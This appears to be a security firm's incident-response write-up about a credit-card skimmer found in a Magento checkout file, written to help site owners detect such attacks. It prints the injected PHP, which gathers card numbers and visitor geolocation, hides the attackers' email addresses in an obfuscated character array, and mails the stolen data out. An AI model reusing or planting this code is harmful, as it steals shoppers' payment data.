Lately, we’ve uncovered and detailed lots of techniques being used against e-commerce platforms to steal sensitive information, mostly credit card and login credentials. With the holiday season approaching, e-commerce platforms become an even higher target due to increase in sales during the season.
In this incident response case, attackers used server resources, more specifically the mail() function to send all the sensitive data after assembling it in a very interesting way.
During our analysis, we identified the following malicious code added into the file ‘./app/code/core/Mage/Checkout/Model/Type/Onepage.php’:
$a = getenv('REMOTE_ADDR');$a = json_decode(file_get_contents("hxxp://www(.)geoplugin(.)net/json(.)gp?ip={$a}"));$datasend.="Visit = ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."n";$binCC = substr($data['cc_number'], 0, 6); $subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$a->geoplugin_countryName;
$headers = “MIME-Version: 1.0n”;$ar=array(“0″=>”h”,”1″=>”i”,”2″=>”a”,”3″=>”@”,”4″=>”s”,”5″=>”t”,”6″=>”p”,”7″=>”o”,”8″=>”.”,”9″=>”m”,”10″=>”e”,”11″=>”g”,”12″=>”c”,”13″=>”r”,”14″=>”l”,”15″=>”n”,”16″=>”y”,”17″=>”b”,”18″=>”k”,”19″=>”u”,”20″=>”d”);$recipient=$ar[“6”].$ar[“7”].$ar[“4”].$ar[“5”].$ar[“11”].$ar[“0”].$ar[“7”].$ar[“4”].$ar[“5”].$ar[“1”].$ar[“6”].$ar[“3”].$ar[“11”].$ar[“9”].$ar[“2”].$ar[“1”].$ar[“14”].$ar[“8”].$ar[“12”].$ar[“7”].$ar[“9”];$sendd=$ar[“6”].$ar[“7”].$ar[“4”].$ar[“5”].$ar[“3”].$ar[“11”].$ar[“10”].$ar[“5”].$ar[“2”].$ar[“20”].$ar[“20”].$ar[“13”].$ar[“8”].$ar[“15”].$ar[“10”].$ar[“5”];mail($recipient,$subject,$datasend,$headers);mail($sendd,$subject,$datasend,$headers);
The code fetches geo location information, such as IP Address, Country, Region, City and adds into the variable $datasend, along with sensitive credit card info.
In addition to that, attackers also declared a set of characters into an array ($ar) and then, carefully crafted the content assigned to the variables $recipient and $sendd – ‘postghostip(at)gmail.com’ and ‘post(at)getaddr.net’ respectively.
Once the string is crafted and attackers have all the information they need, they send it through a mail() function to the address previously mentioned.
These type of file modifications can be easily detected if you have in place a File Integrity Monitoring System. It’s also very important to check your http / ftp logs in order to detect the entry point and vulnerability that attackers may be taking advantage of. Last but not least, we also recommend deploying a Website Firewall solution to prevent future attacks.